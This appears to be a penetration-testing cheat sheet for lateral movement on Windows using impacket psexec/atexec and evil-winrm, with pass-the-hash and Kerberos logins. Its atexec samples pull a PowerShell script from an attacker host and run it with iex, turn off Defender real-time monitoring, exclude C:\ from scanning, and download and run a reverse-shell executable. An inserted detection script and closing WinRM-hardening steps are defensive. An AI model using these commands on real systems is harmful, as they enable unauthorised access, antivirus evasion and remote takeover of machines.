TLDRBins / Winrm



PsExec

# Domain auth
impacket-psexec '<DOMAIN>/<USER>:<PASSWORD>@<TARGET>'
Sample Output: TO-DO

# Local auth
impacket-psexec '<USER>:<PASSWORD>@<TARGET>'
Sample Output: TO-DO

# Domain auth (pass-the-hash)
impacket-psexec '<DOMAIN>/<USER>@<TARGET>' -hashes :<HASH>
Sample Output: TO-DO

# Local auth (pass-the-hash)
impacket-psexec '<USER>@<TARGET>' -hashes :<HASH>
Sample Output: TO-DO

AtExec

# Local auth
impacket-atexec '<WORKGROUP>/<USER>:<PASSWORD>@<TARGET_DOMAIN>' 'powershell.exe -c "<CMD>"'
Sample Output:
impacket-atexec 'WORKGROUP/test:test@192.168.10.2' 'powershell.exe -c "iex(iwr http://192.168.10.1:8443/shell.ps1 -UseBasicParsing)"'

# Local auth (pass-the-hash)
impacket-atexec '<WORKGROUP>/<USER>@<TARGET_DOMAIN>' -hashes :<HASH> 'powershell.exe -c "<CMD>"'
Sample Output:
$ impacket-atexec -hashes :a29542cb2707bf6d6c1d2c9311b0ff02 'WS01/administrator@WS01.example.com' 'powershell.exe -c "Set-MpPreference -DisableRealtimeMonitoring $true"'
Impacket v0.13.0.dev0 - Copyright Fortra, LLC and its affiliated companies

[!] This will work ONLY on Windows >= Vista
[*] Creating task \gNBJCrJi
[*] Running task \gNBJCrJi
[*] Deleting task \gNBJCrJi
[*] Attempting to read ADMIN$\Temp\gNBJCrJi.tmp

$ impacket-atexec -hashes :a29542cb2707bf6d6c1d2c9311b0ff02 'WS01/administrator@WS01.example.com' 'powershell.exe -c "Set-MpPreference -ExclusionPath C:\\"'
Impacket v0.13.0.dev0 - Copyright Fortra, LLC and its affiliated companies

[!] This will work ONLY on Windows >= Vista
[*] Creating task \cbUEDAaz
[*] Running task \cbUEDAaz
[*] Deleting task \cbUEDAaz
[*] Attempting to read ADMIN$\Temp\cbUEDAaz.tmp

$ impacket-atexec -hashes :a29542cb2707bf6d6c1d2c9311b0ff02 'WS01/administrator@WS01.example.com' 'powershell.exe -c "iwr 10.8.7.13:8443/rev.exe -outfile C:\programdata\rev.exe"'
Impacket v0.13.0.dev0 - Copyright Fortra, LLC and its affiliated companies

[!] This will work ONLY on Windows >= Vista
[*] Creating task \RmSAvink
[*] Running task \RmSAvink
[*] Deleting task \RmSAvink
[*] Attempting to read ADMIN$\Temp\RmSAvink.tmp

$ impacket-atexec -hashes :a29542cb2707bf6d6c1d2c9311b0ff02 'WS01/administrator@WS01.example.com' 'powershell.exe -c "C:\programdata\rev.exe"'
Impacket v0.13.0.dev0 - Copyright Fortra, LLC and its affiliated companies

[!] This will work ONLY on Windows >= Vista
[*] Creating task \LCpKICMQ
[*] Running task \LCpKICMQ
[*] Deleting task \LCpKICMQ
[*] Attempting to read ADMIN$\Temp\LCpKICMQ.tmp
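Defender-side note, added here and not part of the TLDRBins page: the atexec runs above leave a recognisable footprint in the Windows Security log (an 8-letter task name created directly under the root task folder, its output captured in Windows\Temp\<task>.tmp, and the task deleted seconds later). The script below scores task-creation events (4698 created, 4699 deleted) on those indicators; the event records are constructed samples with simplified field names, and the exact argument string is an assumption.

```python
import re
from datetime import datetime

# Constructed Security log entries (4698 = task created, 4699 = task deleted), not real captures.
# Field names are simplified from TaskName / SubjectUserName / TaskContent; the task names and the
# Temp\<task>.tmp file follow the atexec output above, the argument string itself is an assumption.
SAMPLE_EVENTS = [
    {"ts": "2024-05-01T10:00:01", "id": 4698, "user": "WS01\\administrator", "task": "\\gNBJCrJi",
     "args": '/C powershell.exe -c "Set-MpPreference -DisableRealtimeMonitoring $true"'
             ' > %windir%\\Temp\\gNBJCrJi.tmp 2>&1'},
    {"ts": "2024-05-01T10:00:03", "id": 4699, "user": "WS01\\administrator", "task": "\\gNBJCrJi",
     "args": ""},
    {"ts": "2024-05-01T10:05:00", "id": 4698, "user": "NT AUTHORITY\\SYSTEM",
     "task": "\\Microsoft\\Windows\\Defrag\\ScheduledDefrag", "args": "-c -h -o -$"},
    {"ts": "2024-05-01T11:00:00", "id": 4698, "user": "WS01\\backupsvc", "task": "\\NightlyBackup",
     "args": "/C C:\\Scripts\\backup.cmd > C:\\Logs\\backup.log 2>&1"},
]

ROOT_RANDOM = re.compile(r"^\\([A-Za-z]{8})$")            # \gNBJCrJi: 8 letters directly under root
TEMP_TMP = re.compile(r"Temp\\([A-Za-z]{8})\.tmp", re.I)  # ... > %windir%\Temp\gNBJCrJi.tmp 2>&1


def score_task_events(events, max_lifetime_s=60):
    """Score every 4698 event on atexec-style indicators; returns {task: (score, reasons)}."""
    deleted_at = {e["task"]: datetime.fromisoformat(e["ts"]) for e in events if e["id"] == 4699}
    results = {}
    for e in events:
        if e["id"] != 4698:
            continue
        reasons = []
        name = ROOT_RANDOM.match(e["task"])
        if name:
            reasons.append("8-letter random task name in the root task folder")
        out = TEMP_TMP.search(e["args"])
        if name and out and out.group(1) == name.group(1):
            reasons.append("command output captured in Windows\\Temp\\<task>.tmp")
        gone = deleted_at.get(e["task"])
        if gone and (gone - datetime.fromisoformat(e["ts"])).total_seconds() <= max_lifetime_s:
            reasons.append(f"task deleted within {max_lifetime_s}s of creation")
        results[e["task"]] = (len(reasons), reasons)
    return results


def suspicious_tasks(events, threshold=2):
    """Task names scoring at or above the threshold (two or more indicators)."""
    return sorted(t for t, (s, _) in score_task_events(events).items() if s >= threshold)


if __name__ == "__main__":
    for task, (score, reasons) in score_task_events(SAMPLE_EVENTS).items():
        print(f"{task:45} score={score} {'; '.join(reasons)}")
```

A single indicator (for instance a short task name) is a weak signal on its own; the create/capture/delete triple within seconds is what separates this pattern from ordinary scheduled-task administration.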

Evil-WinRM

# Password auth
evil-winrm -i <TARGET> -u '<USER>' -p '<PASSWORD>'
Sample Output:
$ evil-winrm -i 127.0.0.1 -u dr.zaiuss -p 'qwe123QWE!@#'

Evil-WinRM shell v3.5

Warning: Remote path completions is disabled due to ruby limitation: quoting_detection_proc() function is unimplemented on this machine

Data: For more information, check Evil-WinRM GitHub: https://github.com/Hackplayers/evil-winrm#Remote-path-completion

Info: Establishing connection to remote endpoint

*Evil-WinRM* PS C:\Users\Dr.Zaiuss\Documents>

# Pass-the-hash
evil-winrm -i <TARGET> -u '<USER>' -H <HASH>
Sample Output: TO-DO

# Kerberos auth
# Step 1: Edit '/etc/krb5.conf' (All in uppercase)
[libdefaults]
    default_realm = <DOMAIN>

[realms]
    <DOMAIN> = {
        kdc = <DC>:88
        admin_server = <DC>
        default_domain = <DOMAIN>
    }

[domain_realm]
    .domain.internal = <DOMAIN>
    domain.internal = <DOMAIN>

Sample Output:
[libdefaults]
    default_realm = WINDCORP.HTB

[realms]
    WINDCORP.HTB = {
        kdc = HOPE.WINDCORP.HTB:88
        admin_server = HOPE.WINDCORP.HTB
        default_domain = WINDCORP.HTB
    }

[domain_realm]
    .domain.internal = WINDCORP.HTB
    domain.internal = WINDCORP.HTB

# Step 2: Request a TGT (clock must be in sync with the DC)
sudo ntpdate -s <DC_IP> && impacket-getTGT '<DOMAIN>/<USER>:<PASSWORD>' -dc-ip <DC_IP>
Sample Output: TO-DO

# Step 3: Export the .ccache
export KRB5CCNAME=<CCACHE>
Sample Output:
$ export KRB5CCNAME=winrm_user.ccache

# Step 4: Connect
sudo ntpdate -s <DC_IP> && evil-winrm -i <TARGET> -r <DOMAIN>
Sample Output:
$ evil-winrm -i dc.absolute.htb -r absolute.htb

Evil-WinRM shell v3.5

Warning: Remote path completions is disabled due to ruby limitation: quoting_detection_proc() function is unimplemented on this machine

Data: For more information, check Evil-WinRM GitHub: https://github.com/Hackplayers/evil-winrm#Remote-path-completion

Info: Establishing connection to remote endpoint

*Evil-WinRM* PS C:\Users\winrm_user\Documents>

# Certificate auth (SSL)
evil-winrm -i <TARGET> -S -k auth.key -c auth.crt
Sample Output: TO-DO

Disable WinRM

# Step 1: Remove the PowerShell remoting session configurations
Disable-PSRemoting -Force
Sample Output: TO-DO

# Step 2: Stop the WinRM service
Stop-Service WinRM -PassThru
Sample Output: TO-DO

# Step 3: Keep it from starting again at boot
Set-Service WinRM -StartupType Disabled -PassThru
Sample Output: TO-DO